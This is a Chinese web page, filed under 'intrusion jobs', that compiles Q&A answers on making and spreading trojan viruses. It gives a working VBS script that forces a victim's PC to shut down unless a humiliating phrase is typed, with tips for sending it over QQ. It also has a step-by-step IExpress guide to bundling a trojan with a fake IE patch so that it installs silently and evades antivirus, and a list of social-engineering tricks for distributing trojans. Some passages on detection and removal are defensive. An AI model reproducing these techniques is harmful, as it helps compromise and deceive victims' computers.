当前位置：首页 > 入侵接单 > 正文内容

怎么制作木马病毒代码（如何生成木马病毒）

hacker3年前 (2022-05-27)入侵接单83

本文导读目录：

1、我需要木马病毒

2、谁能教我简单的木马程序，我不是想做木马病毒，而是像知道它的程序是怎么的，最好就是有说明

3、木马病毒怎么编程，有什么编，编程后怎么用？

4、如何对木马，病毒进行加壳，有什么代码或者软件可以用？

5、木马是怎么做的？

6、怎么编木马病毒

7、那位全方位教我制做木马病毒或告诉我一个木马生成器[高悬赏]

我需要木马病毒

方法如下：在开始内点击运行输入at xx:xx shutdown -s,xx：xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机如果要取消，就输入shutdown -a就可以取消了.

我听一个朋友说，有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。

脚本，例如下面的东西。就可以实现。

1。

首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看

把隐藏已知文件类型的扩展名前面的勾去掉.

然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject("wscript.shell")

WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪，不说我是猪就一分钟关你机，不信，你试试···"" ",0 ,true

dim a

do while(a "我是猪")

a = inputbox ("说我是猪,就不关机，快撒，说 ""我是猪""　","说不说","不说",8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

loop

msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵，猪"

dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

WSHshell.run "cmd.exe /c shutdown -a",0 ,true

msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"

复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序，这样你再压缩下用QQ发给你朋友，对方打

开了就在60秒内要关闭计算机，

结素任务都不行，他只能说他是猪才能解决问题。够坏吧？注意哦，你可以把我是猪那个修改成任

意想说的话，要是对付你喜欢的人，

就修改成我爱你这样他只有说我爱你之后才不关闭计算机哦也可以把时间修改为20 就是说打

开了20秒就关了,还没等对方打完就关机了是不是叫对方很郁闷呢?

第2招编写VBS脚本

首先你可以看下面的

WScript.Echo("嘿，谢谢你打开我哦，我等你很久拉！"TSName)

WScript.Echo("你是可爱的小朋吗?")

WScript.Echo("哈,我想你拉，这你都不知道吗？")

WScript.Echo("怎么才来，说~是不是不关心我")

WScript.Echo("哼,我生气拉，等你这么久，心都凉啦。")

WScript.Echo("小强很生气，后果很严重哦。")

WScript.Echo("嘿嘿！你也会很惨滴哦")

WScript.Echo("是不是想清除我？")

WScript.Echo("那你要点上50下哦，不过会给你惊喜滴")

WScript.Echo("还剩49下，快点点哦")

WScript.Echo("还剩48下，快点，小笨蛋！")

WScript.Echo("还剩47下对，就这样快点点！")

WScript.Echo("还剩46下。你啊就是笨，要快哦，我先不打扰你工作。")

WScript.Echo("还剩45下，记得要快哦！")

WScript.Echo("还剩43下")

WScript.Echo("还剩42下")

WScript.Echo("还剩41下")

WScript.Echo("还剩40下")

WScript.Echo("还剩39下")

WScript.Echo("还剩38下")

WScript.Echo("还剩37下")

WScript.Echo("还剩36下")

WScript.Echo("还剩35下")

WScript.Echo("还剩34下")

WScript.Echo("还剩33下")

WScript.Echo("还剩32下")

WScript.Echo("还剩30下")

WScript.Echo("还剩29下")

WScript.Echo("还剩28下")

WScript.Echo("还剩27下")

WScript.Echo("还剩26下")

WScript.Echo("还剩25下")

WScript.Echo("还剩24下")

WScript.Echo("还剩23下")

WScript.Echo("还剩22下")

WScript.Echo("还剩21下")

WScript.Echo("还剩20下")

WScript.Echo("还剩19下")

WScript.Echo("还剩18下")

WScript.Echo("还剩17下")

WScript.Echo("还剩16下")

WScript.Echo("还剩15下")

WScript.Echo("还剩14下")

WScript.Echo("还剩13下停停！！！慢点，我有话要说")

WScript.Echo("还剩12下，你继续点我就会消失滴")

WScript.Echo("还剩11下，以后就看不到我拉。555555")

WScript.Echo("还剩10下，你现在可以选择停止！")

WScript.Echo("还剩9下。你还点啊，不要我拉？")

WScript.Echo("还剩8下，有点伤心拉，干嘛丢弃人家")

WScript.Echo("还剩7下。疯了，你有点负意！")

WScript.Echo("还剩6下。对。你就点吧，我恨你！")

WScript.Echo("还剩5下，不明白，删除我你就好吗？")

WScript.Echo("还剩4下！真要删除我？")

WScript.Echo("还剩3下。可是我真的很眷恋你。。。")

WScript.Echo("还剩2下。不要这么绝情嘛，人家是爱你的！")

WScript.Echo("还剩1下。哼，既然你这么绝情。也别怪我无义！！！")

WScript.Echo("我本因该消失的，不过我留恋你滴芳容，上帝又给了一次机会。")

WScript.Echo("想结素我么?那你就再多点一次")

把这个复制在记事本,把后缀修改成.vbs

在打开呢就会先说第一句的嘿，谢谢你打开我哦，我等你很久拉！

他无论是点关闭或者是点确定都会再说第2句

再点就说地3句会按顺序说完

你们注意哦，最后10句话，只是10句，你要是把这个复制再粘贴N次，那他还有个打完呢？

这样才做到整人了，要是给喜欢的人发去啊，那就写你要说的话吧，双引号里面的可以随便更改

这个最简单的就是结素任务来结束它

2。

把以下代码复制到记事本中然后重命名为后缀名为VBS的文件～

msgbox"爽死你~"

loop

Windows XP的关机是由Shutdown.exe程序来控制的，位于Windows\System32文件夹中。如

果想让Windows 2000也实现同样的效果，可以把Shutdown.exe复制到系统目录下。

比如你的电脑要在22:00关机，可以选择“开始→运行”，输入“at 22:00 Shutdown -s”，

这样，到了22点电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工

作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60

分钟后自动关机，“3600”代表60分钟。

设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入

“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。

Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如

“-s”就表示关闭本地计算机，“-a”表示取消关机操作，下面列出了更多参数，大家

可以在Shutdown.exe中按需使用。

-f：强行关闭应用程序

-m \\计算机名：控制远程计算机

-i：显示图形用户界面，但必须是Shutdown的第一个选项

-l：注销当前用户

-r：关机并重启

-t 时间：设置关机倒计时

-c "消息内容"：输入关机对话框中的消息内容（不能超127个字符）

有时候，我们需要定时关闭计算机，下面介绍一个在Windows XP下实现定时关机的简单方

法。

指定系统在22分钟后自动关闭：点击“开始→运行”，在“打开”中输入命令“Shutdown

－s －t 1320”（注意：引号不输入，参数之间有空格，1320的单位是秒），单击“确定”

按钮即可。

指定系统在某个时间（比如12：00）自动关闭：在“打开”中输入命令

“at 12：00 Shutdown －s”即可。

取消定时关机：在“打开”中输入命令“Shutdown －a”即可。

能的实现都是使用“Shutdown”命令实现的，shutdown的参数是在命令行窗口中输入

“shutdown”。笔者认为最有用的是“－i”参数，可以调出“远程关机对话框”，

能方便地实现局域网内计算机的远程关机，有兴趣的朋友可以试一试。

开始-程序-附件-系统工具-计划任务-添加任务计划-下一步-浏览

-c:\windows\system32\shadow.exe-下一步-选好要关机的时间，

下一步-输入用户名和密码，只要是系统里有的用户就行，但一定要有密码，

没有也要设一个，下一步，选上“在完成时打开此任务的高级属性”，

在运行栏后面加上“ -S”引号不要哦。

谁能教我简单的木马程序，我不是想做木马病毒，而是像知道它的程序是怎么的，最好就是有说明

这个涉及到高级编程~~~~不是容易做的

只要学习如何发现电脑中的木马就可以了~~~~

木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False、 ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。当然它也会悄无声息地启动，你当然不会指望用户每次启动后点击“木马”图标来运行服务端，，“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈 “木马”是怎样自动加载的。

在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如 “AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是 “explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY－LOCAL－ MACHINESoftwareMicrosoftWindowsCurrentVersionRun”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY－LOCAL－ MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”下的 Explorer 键值改为Explorer=“C:WINDOWSexpiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY－CURRENT－ USERSoftwareMicrosoftWindowsCurrentVersionRun”、“HKEY－ USERS＊＊＊＊SoftwareMicrosoftWindowsCurrentVersionRun”的目录下都有可能，最好的办法就是在 “HKEY－LOCAL－MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

知道了“木马”的工作原理，查杀“木马”就变得很容易，如果发现有“木马”存在，最安全也是最有效的方法就是马上将计算机与网络断开，防止黑客通过网络对你进行攻击。然后编辑win.ini文件，将[WINDOWS]下面，“run=“木马”程序”或“load=“木马”程序”更改为“run=” 和 “load=”；编辑system.ini文件，将[BOOT]下面的“shell=‘木马’文件”，更改为：“shell= explorer.exe”；在注册表中，用regedit对注册表进行编辑，先在“HKEY－LOCAL－ MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下找到“木马”程序的文件名，再在整个注册表中搜索并替换掉“木马”程序，有时候还需注意的是：有的“木马”程序并不是直接将“HKEY－LOCAL－ MACHINESoftwareMicrosoftWindowsCurrentVersionRun”下的“木马”键值删除就行了，因为有的“木马” 如：BladeRunner“木马”，如果你删除它，“木马”会立即自动加上，你需要的是记下“木马”的名字与目录，然后退回到MS－DOS下，找到此 “木马”文件并删除掉。重新启动计算机，然后再到注册表中将所有“木马”文件的键值删除。至此，我们就大功告成了

木马病毒怎么编程，有什么编，编程后怎么用？

要编木马.就要学一门程序设计语言,VB可以,C语言也可以..不过JAVA.之类的就不用了.不用可视化了..

学了语言后你要有对计算机安全系统的了解

然后想出你的木马要做什么

然后设计算法.

最后代码实现就行了..

如何对木马，病毒进行加壳，有什么代码或者软件可以用？

第一步

在“运行”对话框中输入IExpress就可启动程序

在开始的时候会有两个选项供你选择，一个是创建新的自解压文件(Create new Self Extraction Directive file)，另一个是打开已经保存的自解压模板“.sed”文件(Open existing Self Extraction Directive file)。我们应该选择第一项，然后点击“下一步”按钮。[!--empirenews.page--]

第二步

接下来选择制作木马自解压包的三种打包方式(图2)，它们分别是建立自解压并自动安装压缩包(Extract files and run an installation command)、建立自解压压缩包(Extract files only)和建立CAB压缩包(Create compressed files only)。

因为我们要制作的是木马解压包，所以应该选择第一项。在输入压缩包标题后点击“下一步”按钮。

第三步

在“确认提示”(Confirmation prompt)这一环节，软件会询问在木马程序解包前是否提示用户进行确认，由于我们是在制作木马程序的解压包，当然越隐蔽越好，选择第一项“不提示”(No prompt)，这么做的目的是让中招人毫无防备。点击“下一步”按钮，在接下来的添加“用户允许协议”(License agreement)中添加一个伪装的用户协议迷惑中招者，选择“显示用户允许协议”(Display a license)，点击“Browse”选择一份编辑好的TXT文档，此文档可以用微软公司的名义来编辑，设置完毕后点击“下一步”。这一步的目的是迷惑对手并隐藏木马安装的过程。

第四步

现在，我们就进入了文件列表窗口(Packaged files)。点击该窗口中的“Add”按钮添加木马和将要与木马程序捆绑在一起的合法程序。根据刚才编辑的协议文件的内容添加合法程序。例如，你制作的协议和IE补丁包相关，那么你就可将木马和一个正常的IE补丁包添加进来。

随后进入安装程序选择窗口，指定解压缩包开始运行的文件(Install Program)和安装结束后运行的程序(post install command)。例如，在Install Program内设置正常的IE补丁包先运行，此时木马并未运行，在中招者看来的确是一个IE补丁包。在post install command内设置木马程序，这样在IE补丁包安装完毕时，木马程序将会在后台执行，我们的目的也就达到了。

第五步

接下来选择软件在安装过程中的显示模式(Show window)。由于我们的木马是和合法程序捆绑在一起的，所以选择“默认”(Default)即可。接下来进行提示语句(Finished message)的显示设置，由于我们做的是木马捆绑安装程序，当然应该选择“No message”。

第六步

上述设置完成后，接着设置自解压程序的保存位置和名称。在这里要选择“Hide File Extracting Progress Animation from User”，以便隐藏解压缩过程，有助于隐藏某些木马程序启动时弹出的命令提示框。最后，设置在软件安装完成后是否重新启动(Configure reboot)，可以根据实际需要来选择。如果你所用的木马是“即插即用”的，那么就选择“No reboot”;如果所采用的木马用于开启终端服务，那么可选择“Always reboot”，同时选择“重新启动前不提示用户”(Do not prompt user before reboot)。[!--empirenews.page--]

在保存刚才所做的设置后点击“下一步”按钮，即可开始制作木马自解压程序。

整个制作过程是在DOS下进行的，在完成度达到100%后会弹出提示窗口，点击“完成”，木马程序与合法程序的捆绑工作就完成了(格式为EXE)，直接双击即可运行。你再用杀毒软件查一查。怎么样?已经完全不会被查出来了吧。

现在还等什么?赶快利用“木马屠城”介绍过的网页木马传播技术或木马电子书技术发布你的木马去吧。当然，你也可以把它作为IE的重要补丁发送给别人。

不用第三方工具，无需过多的加壳伪装，让“Windows”来为我们服务，为我们捆绑木马，岂不快哉。

木马是怎么做的？

1、捆绑欺骗。把木马服务端和某个游戏捆绑成一个文件在QQ或邮件发给别人。服务端运行后会看到游戏程序正常打开，却不会发觉木马程序已经悄悄运行，可以起到很好的迷惑作用。而且即使别人以后重装系统了，他还是保存你给他的这个“游戏”的话，还是有可能再次中招。

2、这是教科书式的老式欺骗，方法如下：直接将木马服务端发给对方，对方运行，结果毫无反应（运行木马后的典型表现），他说：“怎么打不开呀！” 你说：“哎呀，不会程序是坏了吧？”或者说：“对不起，我发错了！”然后把正确的东西（正常游戏、相片等）发给他，他收到后欢天喜地的就不想刚才该发生的事有什么不对劲了。

3、QQ冒名欺骗。前提：你必须先拥有一个不属于你自己的QQ号。然后使用那个号码给他的好友们发去木马程序，由于信任被盗号码的主人，他的朋友们会毫不犹豫地运行你发给他们的木马程序，结果就中招了。

4、邮件冒名欺骗。和第三种方法类似，用匿名邮件工具冒充好友或大型网站、机构单位向别人发木马附件，别人下载附件并运行的话就中木马了。

5、危险下载点。这是后面几位朋友提到的，蔬菜常用的方法：（据说他已经用这种方法得到了数千台肉鸡）攻破一些下载站点后，下载几个下载量大的软件，捆绑上木马，再悄悄放回去让别人下载，这样以后每增加一次下载次数，你就等于多了一台肉鸡。或者你干脆把木马捆绑到其它软件上,然后"正大光明"的发布到各大软件下载网站,它们也不查毒,就算查也查不出我写的新木马,然后...我就不用说了,肉机会至少两位数。

6、文件夹惯性点击。把木马文件伪装成文件夹图标后，放在一个文件夹中，然后在外面再套三四个空文件夹，很多人出于连续点击的习惯，点到那个伪装成文件夹木马时，也会收不住鼠标点下去，这样木马就成功运行了。

7、zip伪装。这个方法是最新的，将一个木马和一个损坏的zip包（可自制）捆绑在一起，然后指定捆绑后的文件为zip图标，这样一来，除非别人看了他的后缀，否则点下去将和一般损坏的zip没什么两样，根本不知道其实已经有木马在悄悄运行了。

8、在某个公文包或者可以上传附件的论坛传上捆绑好的木马，然后把链接发给受害者。

9、网页木马法。

计算机病毒的主要传播途径有：

1.软盘

软盘作为最常用的交换媒介，在计算机应用的早期对病毒的传播发挥了巨大的作用，因那时计算机应用比较简单，可执行文件和数据文件系统都较小，许多执行文件均通过软盘相互拷贝、安装，这样病毒就能通过软盘传播文件型病毒；另外，在软盘列目录或引导机器时，引导区病毒会在软盘与硬盘引导区互相感染。因此软盘也成了计算机病毒的主要寄生的“温床”。

2.光盘

光盘因为容量大，存储了大量的可执行文件，大量的病毒就有可能藏身于光盘，对只读式光盘，不能进行写操作，因此光盘上的病毒不能清除。以谋利为目的非法盗版软件的制作过程中，不可能为病毒防护担负专门责任，也决不会有真正可靠可行的技术保障避免病毒的传入、传染、流行和扩散。当前，盗版光盘的泛滥给病毒的传播带来了极大的便利。

3.硬盘

由于带病毒的硬盘在本地或移到其他地方使用、维修等，将干净的软盘传染并再扩散。

4.BBS

电子布告栏（BBS）因为上站容易、投资少，因此深受大众用户的喜爱。BBS是由计算机爱好者自发组织的通讯站点，用户可以在BBS上进行文件交换（包括自由软件、游戏、自编程序）。由于BBS站一般没有严格的安全管理，亦无任何限制，这样就给一些病毒程序编写者提供了传播病毒的场所。各城市 BBS站间通过中心站间进行传送，传播面较广。随着BBS在国内的普及，给病毒的传播又增加了新的介质。

5.网络

现代通信技术的巨大进步已使空间距离不再遥远，数据、文件、电子邮件可以方便地在各个网络工作站间通过电缆、光纤或电话线路进行传送，工作站的距离可以短至并排摆放的计算机，也可以长达上万公里，正所谓“相隔天涯，如在咫尺”，但也为计算机病毒的传播提供了新的“高速公路”。计算机病毒可以附着在正常文件中，当您从网络另一端得到一个被感染的程序，并在您的计算机上未加任何防护措施的情况下运行它，病毒就传染开来了。这种病毒的传染方式在计算机网络连接很普及的国家是很常见的，国内计算机感染一种“进口”病毒已不再是什么大惊小怪的事了。在我们信息国际化的同时，我们的病毒也在国际化。大量的国外病毒随着互联网络传入国内。

随着Internet的风靡，给病毒的传播又增加了新的途径，并将成为第一传播途径。Internet开拓性的发展使病毒可能成为灾难，病毒的传播更迅速，反病毒的任务更加艰巨。Internet带来两种不同的安全威胁，一种威胁来自文件下载，这些被浏览的或是通过FTP下载的文件中可能存在病毒。另一种威胁来自电子邮件。大多数Internet邮件系统提供了在网络间传送附带格式化文档邮件的功能，因此，遭受病毒的文档或文件就可能通过网关和邮件服务器涌入企业网络。网络使用的简易性和开放性使得这种威胁越来越严重。

当前，Internet网上病毒的最新趋势是：（1）不法分子或好事之徒制作的匿名个人网页直接提供了下载大批病毒活样本的便利途径。（2）由于学术研究的病毒样本提供机构同样可以成为别有用心的人的使用工具。（3）由于网络匿名登录才成为可能的专门关于病毒制作研究讨论的学术性质的电子论文、期刊、杂志及相关的网上学术交流活动，如病毒制造协会年会等等，都有可能成为国内外任何想成为新的病毒制造者学习、借鉴、盗用、抄袭的目标与对象。（4）散见于网站上大批病毒制作工具、向导、程序等等，使得无编程经验和基础的人制造新病毒成为可能。（5）新技术、新病毒使得几乎所有人在不知情时无意中成为病毒扩散的载体或传播者

取得木马方法: 去网上下载原代码.